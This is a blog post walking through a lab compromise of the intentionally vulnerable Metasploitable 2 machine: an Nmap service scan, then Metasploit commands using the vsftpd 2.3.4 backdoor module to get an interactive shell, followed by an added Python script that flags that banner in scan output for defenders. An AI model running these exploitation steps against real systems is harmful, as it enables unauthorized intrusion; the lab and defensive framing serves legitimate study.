Wednesday, 17 October 2012

Metasploitable 2 has been PWNED with Metasploit

Posted at 00:09
Hi all, today I want to share how to pwn Metasploitable v2.
You can download Metasploitable v2 here.
After installing Metasploitable 2 in a virtual machine, we start the pentest steps.

  1. Scan the running services on the target machine.
  2. Here, I'm using Nmap to do this job:
    # nmap -sV -A
  3. I got this information about the services:
    Starting Nmap 6.01 ( ) at 2012-10-17 17:18 EDT
    Nmap scan report for
    Host is up (0.00097s latency).
    Not shown: 977 closed ports
    21/tcp open ftp vsftpd 2.3.4
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp open telnet Linux telnetd
    25/tcp open smtp Postfix smtpd
    53/tcp open domain ISC BIND 9.4.2
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
    139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    512/tcp open exec netkit-rsh rexecd
    513/tcp open login?
    514/tcp open shell?
    1099/tcp open rmiregistry GNU Classpath grmiregistry
    1524/tcp open ingreslock?
    2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
    2121/tcp open ftp ProFTPD 1.3.1
    3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
    5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open vnc VNC (protocol 3.3)
    6000/tcp open X11 (access denied)
    6667/tcp open irc Unreal ircd
    8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
    8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  4. OK, too many services. I will try vsftpd 2.3.4 first.
  5. Run Metasploit and search for the exploit for vsftpd 2.3.4.
  6. Use the search command in Metasploit:
    # msf> search vsftpd
  7. It will return:
    exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution
  8. Use the exploit above:
    # msf> use exploit/unix/ftp/vsftpd_234_backdoor
  9. Check the exploit's options:
    # msf  exploit(vsftpd_234_backdoor) > show options
  10. Set RHOST to the target IP:
    # msf  exploit(vsftpd_234_backdoor) > set RHOST
  11. Show the available payloads:
    # msf  exploit(vsftpd_234_backdoor) > show payloads
  12. Select the payload:
    # msf  exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
  13. Run the exploit command:
    # msf  exploit(vsftpd_234_backdoor) > exploit
  14. Wait and you will be dropped into a Linux shell. Type uname -a and you will see the kernel version of Metasploitable 2.
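
From the defender's side, the same Nmap -sV output is the starting point for an exposure review: which of the banners on the box match a version with a known public exploit module, and which ports Nmap could not even identify. Here is an added Python example (not part of the original post or of Metasploit) that parses the scan lines above into records and checks them against a small, hypothetical watch-list; the sample lines are taken from the scan shown, and the only real watch-list entry is the vsftpd 2.3.4 module the post uses.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the Nmap -sV lines from the scan above.
SAMPLE_NMAP_OUTPUT = """\
Not shown: 977 closed ports
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
513/tcp open login?
1524/tcp open ingreslock?
2121/tcp open ftp ProFTPD 1.3.1
6667/tcp open irc Unreal ircd
"""

# Hypothetical watch-list: (service name, banner prefix) -> Metasploit module.
# Only the vsftpd entry is real; it is the module the post itself runs.
KNOWN_BACKDOORED = {
    ("ftp", "vsftpd 2.3.4"): "exploit/unix/ftp/vsftpd_234_backdoor",
}

# port/proto, "open", service name, then the free-text version banner.
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    name: str
    version: str  # empty when Nmap could not fingerprint the service


def parse_nmap(text: str) -> list[Service]:
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip headers such as "Not shown: ..."
        port, proto, name, version = m.groups()
        # Nmap appends "?" to a service guess it could not confirm.
        unconfirmed = name.endswith("?")
        services.append(Service(int(port), proto, name.rstrip("?"),
                                "" if unconfirmed else version.strip()))
    return services


def flag_backdoored(services: list[Service]) -> list[tuple[int, str]]:
    """Return (port, module) for banners on the watch-list."""
    return [(s.port, module) for s in services
            for (name, prefix), module in KNOWN_BACKDOORED.items()
            if s.name == name and s.version.startswith(prefix)]


def unidentified(services: list[Service]) -> list[int]:
    """Ports whose service Nmap could not fingerprint; review these by hand."""
    return [s.port for s in services if not s.version]
```

Running `flag_backdoored(parse_nmap(SAMPLE_NMAP_OUTPUT))` reports port 21 against the vsftpd module, and `unidentified(...)` lists the unconfirmed ports 513 and 1524 that the scan leaves as question marks.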

Read my next post: Metasploitable 2 pwned with Metasploit - Part 2
